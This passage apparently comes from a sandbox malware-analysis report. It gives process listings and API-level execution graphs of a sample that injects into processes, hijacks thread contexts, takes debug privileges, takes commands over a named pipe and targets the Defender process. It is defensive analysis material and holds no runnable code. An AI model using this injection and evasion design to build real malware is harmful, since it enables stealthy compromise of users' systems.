                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:45
                                                Start time:08:46:37
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\dllhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}
                                                Imagebase:0x7ff7d8730000
                                                File size:21'312 bytes
                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:46
                                                Start time:08:46:38
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:47
                                                Start time:08:46:38
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:48
                                                Start time:08:46:39
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                Imagebase:0x7ff62d520000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:49
                                                Start time:08:46:39
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:50
                                                Start time:08:46:39
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:44.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:72.9%
                                                  Total number of Nodes:251
                                                  Total number of Limit Nodes:30
                                                  execution_graph 527 1400036f4 528 140003701 527->528 530 140003721 ConnectNamedPipe 528->530 531 140003716 Sleep 528->531 537 140002300 AllocateAndInitializeSid 528->537 532 14000377f Sleep 530->532 533 140003730 ReadFile 530->533 531->528 535 14000378a DisconnectNamedPipe 532->535 534 140003753 WriteFile 533->534 533->535 534->535 535->530 538 14000241b 537->538 539 14000235d SetEntriesInAclW 537->539 538->528 539->538 540 1400023a1 LocalAlloc 539->540 540->538 541 1400023b5 InitializeSecurityDescriptor 540->541 541->538 542 1400023c5 SetSecurityDescriptorDacl 541->542 542->538 543 1400023dc CreateNamedPipeW 542->543 543->538 544 140003634 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 545 14000368a K32EnumProcesses 544->545 546 1400036e7 Sleep 545->546 547 14000369f 545->547 546->545 548 1400036d8 547->548 550 140003190 547->550 548->546 551 1400031a1 550->551 552 1400031c9 550->552 556 140001868 OpenProcess 551->556 552->547 555 140001868 31 API calls 555->552 557 140001cd1 556->557 558 1400018b0 IsWow64Process 556->558 557->555 559 1400018c7 CloseHandle 558->559 559->557 561 1400018ed 559->561 561->557 562 14000192f OpenProcess 561->562 562->557 563 14000194b OpenProcess 562->563 564 140001a04 NtQueryInformationProcess 563->564 565 14000196a K32GetModuleFileNameExW 563->565 566 140001cc8 CloseHandle 564->566 567 140001a29 564->567 568 1400019b3 CloseHandle 565->568 569 140001983 PathFindFileNameW lstrlenW 565->569 566->557 567->566 571 140001a33 OpenProcessToken 567->571 568->564 570 1400019c1 568->570 569->568 572 1400019a0 StrCpyW 569->572 570->564 573 1400019e0 StrCmpIW 570->573 571->566 574 140001a51 GetTokenInformation 571->574 572->568 573->566 573->570 575 140001af4 574->575 576 140001a79 GetLastError 574->576 578 140001afb CloseHandle 575->578 576->575 577 140001a84 LocalAlloc 576->577 577->575 579 140001a9a GetTokenInformation 577->579 578->566 583 140001b0f 578->583 580 140001ae2 579->580 581 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 579->581 582 140001ae9 LocalFree 580->582 581->582 582->578 583->566 584 140001b9f StrStrA 583->584 585 140001bc8 583->585 584->583 586 140001bcd 584->586 585->566 586->566 587 140001bf8 VirtualAllocEx 586->587 587->566 588 140001c27 WriteProcessMemory 587->588 588->566 589 140001c46 588->589 597 140002bfc 589->597 591 140001c66 591->566 592 140001c74 WaitForSingleObject 591->592 593 140001c83 GetExitCodeThread 592->593 594 140001cbd CloseHandle 592->594 595 140001ca2 VirtualFreeEx 593->595 596 140001c99 593->596 594->566 595->594 596->595 600 1400020cc GetModuleHandleA 597->600 601 1400020f5 600->601 602 1400020ec GetProcAddress 600->602 602->601 603 140002d38 606 140002d4c 603->606 651 140002a0c 606->651 609 140002a0c 14 API calls 610 140002d74 GetCurrentProcessId OpenProcess 609->610 611 140002d94 OpenProcessToken 610->611 612 140002e06 RegOpenKeyExW 610->612 613 140002da8 LookupPrivilegeValueW 611->613 614 140002dfd CloseHandle 611->614 615 140002e37 RegQueryValueExW 612->615 616 140002d41 ExitProcess 612->616 613->614 617 140002dbf AdjustTokenPrivileges 613->617 614->612 615->616 618 140002e67 RegQueryValueExW 615->618 617->614 619 140002df7 GetLastError 617->619 618->616 620 140002e97 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 618->620 619->614 620->616 621 140002f09 RegQueryValueExW 620->621 621->616 622 140002f39 RegCloseKey GetCurrentProcessId 621->622 665 14000200c GetProcessHeap HeapAlloc 622->665 624 140002f50 RegCreateKeyExW 625 14000304a CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 624->625 626 140002f8d ConvertStringSecurityDescriptorToSecurityDescriptorW 624->626 627 14000151c 50 API calls 625->627 628 140002fb5 RegSetKeySecurity LocalFree 626->628 629 140002fcf RegCreateKeyExW 626->629 632 1400030d4 627->632 628->629 630 140003009 GetCurrentProcessId RegSetValueExW RegCloseKey 629->630 631 140003040 RegCloseKey 629->631 630->631 631->625 633 140003112 632->633 634 1400030e0 ShellExecuteW 632->634 635 14000148c 6 API calls 633->635 634->633 634->634 636 14000311a 635->636 637 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 636->637 638 140003123 637->638 639 14000148c 6 API calls 638->639 640 14000312c 639->640 641 14000148c 6 API calls 640->641 642 140003135 641->642 643 14000148c 6 API calls 642->643 644 14000313e 643->644 645 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 644->645 646 140003147 645->646 647 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 646->647 648 140003150 647->648 649 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 648->649 650 140003159 GetProcessHeap HeapFree SleepEx 649->650 650->616 652 140002a15 StrCpyW StrCatW GetModuleHandleW 651->652 653 140002bdf 651->653 652->653 654 140002a66 GetCurrentProcess K32GetModuleInformation 652->654 653->609 655 140002bd6 FreeLibrary 654->655 656 140002a96 CreateFileW 654->656 655->653 656->655 657 140002acb CreateFileMappingW 656->657 658 140002af4 MapViewOfFile 657->658 659 140002bcd CloseHandle 657->659 660 140002bc4 CloseHandle 658->660 661 140002b17 658->661 659->655 660->659 661->660 662 140002b30 lstrcmpiA 661->662 664 140002b6e 661->664 662->661 663 140002b70 VirtualProtect VirtualProtect 662->663 663->660 664->660 671 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 665->671 667 1400020a5 GetProcessHeap HeapFree 668 140002050 668->667 669 140002071 OpenProcess 668->669 669->668 670 140002087 TerminateProcess CloseHandle 669->670 670->668 672 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 671->672 676 140001d7d 671->676 672->668 673 140001d92 OpenProcess 674 140001daf K32EnumProcessModulesEx 673->674 673->676 675 140001e43 CloseHandle 674->675 674->676 675->676 676->672 676->673 676->675 677 140001de9 ReadProcessMemory 676->677 678 140001e0b 677->678 678->675 678->676 678->677 679 140002cb0 681 140002cbd 679->681 680 140002300 6 API calls 680->681 681->680 682 140002cd2 Sleep 681->682 683 140002cdd ConnectNamedPipe 681->683 682->681 684 140002d21 Sleep 683->684 685 140002cec ReadFile 683->685 686 140002d2c DisconnectNamedPipe 684->686 685->686 687 140002d0f 685->687 686->683 687->686 689 1400031d0 687->689 690 140003413 689->690 691 1400031f7 689->691 692 140003619 690->692 693 14000341f 690->693 694 140003355 ReadFile 691->694 695 1400031fd 691->695 700 140001f7c 22 API calls 692->700 696 1400035c9 693->696 697 14000342b 693->697 698 140003330 694->698 699 14000337f 694->699 701 140003209 695->701 702 14000334c ExitProcess 695->702 703 1400020fc ReadFile 696->703 704 140003434 697->704 705 140003515 697->705 698->687 699->698 706 14000338c GetProcessHeap HeapAlloc 699->706 700->698 701->698 712 1400032c2 ReadFile 701->712 713 140003227 701->713 707 1400035d8 703->707 708 1400034e4 704->708 709 140003440 704->709 777 1400020fc 705->777 710 140001cf0 13 API calls 706->710 707->698 719 1400020fc ReadFile 707->719 774 140002c5c 708->774 709->698 715 14000344c RegOpenKeyExW 709->715 732 1400033c5 710->732 712->698 723 1400032ec 712->723 713->698 717 140003230 GetProcessHeap HeapAlloc K32EnumProcesses 713->717 720 1400034b5 715->720 721 140003479 RegDeleteValueW RegDeleteValueW RegDeleteValueW 715->721 717->698 740 14000326e 717->740 726 1400035eb 719->726 761 14000217c SysAllocString SysAllocString CoInitializeEx 720->761 721->720 722 1400033fa GetProcessHeap HeapFree 722->698 723->698 733 140001868 31 API calls 723->733 724 14000352c ReadFile 724->698 728 140003554 724->728 726->698 730 1400035ef ShellExecuteW 726->730 728->698 734 140003561 GetProcessHeap HeapAlloc ReadFile 728->734 730->698 731 1400034c1 735 14000217c 9 API calls 731->735 732->722 736 1400033f5 732->736 737 1400033f3 732->737 738 140003312 733->738 734->722 739 1400035a5 734->739 741 1400034cd 735->741 753 140001eec 736->753 737->722 743 140001868 31 API calls 738->743 739->722 781 140002434 739->781 740->698 744 1400032bd 740->744 746 140001868 31 API calls 740->746 769 140001f7c GetProcessHeap HeapAlloc 741->769 743->744 744->698 746->740 754 140001f65 753->754 755 140001f0b OpenProcess 753->755 754->722 755->754 756 140001f23 755->756 757 140002bfc 2 API calls 756->757 758 140001f43 757->758 759 140001f5c CloseHandle 758->759 760 140001f51 CloseHandle 758->760 759->754 760->759 762 1400022d8 SysFreeString SysFreeString 761->762 763 1400021bd CoInitializeSecurity 761->763 762->731 764 140002205 CoCreateInstance 763->764 765 1400021f9 763->765 766 1400022d2 CoUninitialize 764->766 767 140002234 VariantInit 764->767 765->764 765->766 766->762 768 14000228a 767->768 768->766 770 140001cf0 13 API calls 769->770 771 140001fba 770->771 772 140001fe8 GetProcessHeap HeapFree 771->772 773 140001eec 5 API calls 771->773 773->771 775 1400020cc 2 API calls 774->775 776 140002c71 775->776 778 140002120 ReadFile 777->778 779 140002143 778->779 780 14000215d 778->780 779->778 779->780 780->698 780->724 782 14000246f 781->782 806 140002726 781->806 784 1400020cc 2 API calls 782->784 805 1400024ae 782->805 782->806 783 1400024d7 CreateProcessW 783->805 784->805 785 1400028e1 OpenProcess 786 1400028f1 TerminateProcess 785->786 785->805 786->805 787 1400020cc GetModuleHandleA GetProcAddress 787->805 788 140002566 VirtualAllocEx 790 140002595 WriteProcessMemory 788->790 788->805 789 14000273f VirtualAllocEx 791 14000276d WriteProcessMemory 789->791 789->805 792 1400025b7 VirtualProtectEx 790->792 790->805 793 14000278f VirtualProtectEx 791->793 791->805 792->805 793->805 794 140002858 VirtualAlloc 798 140002879 Wow64GetThreadContext 794->798 794->805 795 140002682 VirtualAlloc 797 1400026a7 GetThreadContext 795->797 795->805 796 1400027d0 WriteProcessMemory 796->805 800 1400026c4 WriteProcessMemory 797->800 797->805 801 140002891 WriteProcessMemory 798->801 798->805 799 1400025f9 WriteProcessMemory 799->805 802 1400026ef SetThreadContext 800->802 800->805 803 1400028b6 Wow64SetThreadContext 801->803 801->805 804 140002712 ResumeThread 802->804 802->805 803->805 804->805 804->806 805->783 805->785 805->787 805->788 805->789 805->794 805->795 805->796 805->799 805->806 807 140002643 VirtualProtectEx 805->807 808 14000281a VirtualProtectEx 805->808 806->722 807->805 808->805

                                                  Callgraph

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                  • String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                  • API String ID: 3658652915-3222643892
                                                  • Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                  • Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
                                                  • Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                                  • Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001cd1-140001ced 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 CloseHandle 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 140001a04-140001a23 NtQueryInformationProcess 58->59 60 14000196a-140001981 K32GetModuleFileNameExW 58->60 61 140001cc8-140001ccb CloseHandle 59->61 62 140001a29-140001a2d 59->62 63 1400019b3-1400019bf CloseHandle 60->63 64 140001983-14000199e PathFindFileNameW lstrlenW 60->64 61->46 62->61 66 140001a33-140001a4b OpenProcessToken 62->66 63->59 65 1400019c1-1400019db 63->65 64->63 67 1400019a0-1400019b0 StrCpyW 64->67 68 1400019e0-1400019f2 StrCmpIW 65->68 66->61 69 140001a51-140001a77 GetTokenInformation 66->69 67->63 68->61 70 1400019f8-140001a02 68->70 71 140001af4 69->71 72 140001a79-140001a82 GetLastError 69->72 70->59 70->68 74 140001afb-140001b09 CloseHandle 71->74 72->71 73 140001a84-140001a98 LocalAlloc 72->73 73->71 75 140001a9a-140001ac0 GetTokenInformation 73->75 74->61 76 140001b0f-140001b16 74->76 78 140001ae2 75->78 79 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 75->79 76->61 77 140001b1c-140001b27 76->77 77->61 80 140001b2d-140001b37 77->80 81 140001ae9-140001af2 LocalFree 78->81 79->81 82 140001b52 80->82 83 140001b39-140001b43 80->83 81->74 85 140001b56-140001b8e call 1400029a4 * 3 82->85 83->61 84 140001b49-140001b50 83->84 84->85 85->61 92 140001b94-140001bb4 call 1400029a4 StrStrA 85->92 95 140001bb6-140001bc6 92->95 96 140001bcd-140001bf2 call 1400029a4 * 2 92->96 95->92 97 140001bc8 95->97 96->61 102 140001bf8-140001c21 VirtualAllocEx 96->102 97->61 102->61 103 140001c27-140001c40 WriteProcessMemory 102->103 103->61 104 140001c46-140001c68 call 140002bfc 103->104 104->61 107 140001c6a-140001c72 104->107 107->61 108 140001c74-140001c81 WaitForSingleObject 107->108 109 140001c83-140001c97 GetExitCodeThread 108->109 110 140001cbd-140001cc2 CloseHandle 108->110 111 140001ca2-140001cbb VirtualFreeEx 109->111 112 140001c99-140001c9f 109->112 110->61 111->110 112->111
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                  • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                  • API String ID: 2456419452-2628171563
                                                  • Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                  • Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
                                                  • Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                                  • Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 113 1400031d0-1400031f1 114 140003413-140003419 113->114 115 1400031f7 113->115 116 140003619 call 140001f7c 114->116 117 14000341f-140003425 114->117 118 140003355-140003379 ReadFile 115->118 119 1400031fd-140003203 115->119 122 14000361e-140003630 116->122 120 1400035c9-1400035dc call 1400020fc 117->120 121 14000342b-14000342e 117->121 118->122 123 14000337f-140003386 118->123 125 140003209-14000320c 119->125 126 14000334c-14000334e ExitProcess 119->126 120->122 143 1400035de-1400035ed call 1400020fc 120->143 128 140003434-14000343a 121->128 129 140003515-140003526 call 1400020fc 121->129 123->122 130 14000338c-1400033c0 GetProcessHeap HeapAlloc call 140001cf0 123->130 131 140003212-140003215 125->131 132 14000333d-140003347 125->132 136 1400034e4-14000350e call 140002c5c call 140002c88 ExitProcess 128->136 137 140003440-140003446 128->137 129->122 155 14000352c-14000354e ReadFile 129->155 145 1400033c5-1400033c7 130->145 133 14000321b-140003221 131->133 134 140003330-140003338 131->134 132->122 140 1400032c2-1400032e6 ReadFile 133->140 141 140003227-14000322a 133->141 134->122 137->122 144 14000344c-140003477 RegOpenKeyExW 137->144 140->122 154 1400032ec-1400032f3 140->154 141->122 147 140003230-140003268 GetProcessHeap HeapAlloc K32EnumProcesses 141->147 143->122 165 1400035ef-140003617 ShellExecuteW 143->165 150 1400034b5-1400034df call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 144->150 151 140003479-1400034af RegDeleteValueW * 3 144->151 152 1400033c9-1400033cf 145->152 153 1400033fa-14000340e GetProcessHeap HeapFree 145->153 147->122 156 14000326e-14000327f 147->156 150->122 151->150 152->153 160 1400033d1-1400033e3 152->160 153->122 154->122 161 1400032f9-14000332b call 140001868 * 2 154->161 155->122 162 140003554-14000355b 155->162 156->122 163 140003285-1400032bb call 140001868 * 2 156->163 167 1400033e5-1400033e7 160->167 168 1400033e9-1400033f1 160->168 161->122 162->122 170 140003561-14000359f GetProcessHeap HeapAlloc ReadFile 162->170 189 1400032bd 163->189 165->122 167->168 173 1400033f5 call 140001eec 167->173 168->160 174 1400033f3 168->174 170->153 176 1400035a5-1400035b1 170->176 173->153 174->153 176->153 181 1400035b7-1400035c4 call 140002434 176->181 181->153 189->122
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
                                                  • String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
                                                  • API String ID: 2078740077-1712970621
                                                  • Opcode ID: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                  • Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
                                                  • Opcode Fuzzy Hash: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                                  • Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                  • String ID:
                                                  • API String ID: 4084875642-0
                                                  • Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                  • Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
                                                  • Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                                  • Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                  • String ID:
                                                  • API String ID: 3197395349-0
                                                  • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                                  • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                                  • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                  • String ID: .text$C:\Windows\System32\
                                                  • API String ID: 2721474350-832442975
                                                  • Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                  • Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
                                                  • Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                                  • Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                  • String ID: M$\\.\pipe\$nya-childproc
                                                  • API String ID: 2203880229-802795868
                                                  • Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                  • Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
                                                  • Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                                  • Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 238 140002cb0-140002cba 239 140002cbd-140002cd0 call 140002300 238->239 242 140002cd2-140002cdb Sleep 239->242 243 140002cdd-140002cea ConnectNamedPipe 239->243 242->239 244 140002d21-140002d26 Sleep 243->244 245 140002cec-140002d0d ReadFile 243->245 246 140002d2c-140002d35 DisconnectNamedPipe 244->246 245->246 247 140002d0f-140002d14 245->247 246->243 247->246 248 140002d16-140002d1d call 1400031d0 247->248 249 140002d1f 248->249 249->246
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.1604671684.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000000E.00000002.1604617323.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604705862.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000E.00000002.1604738445.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
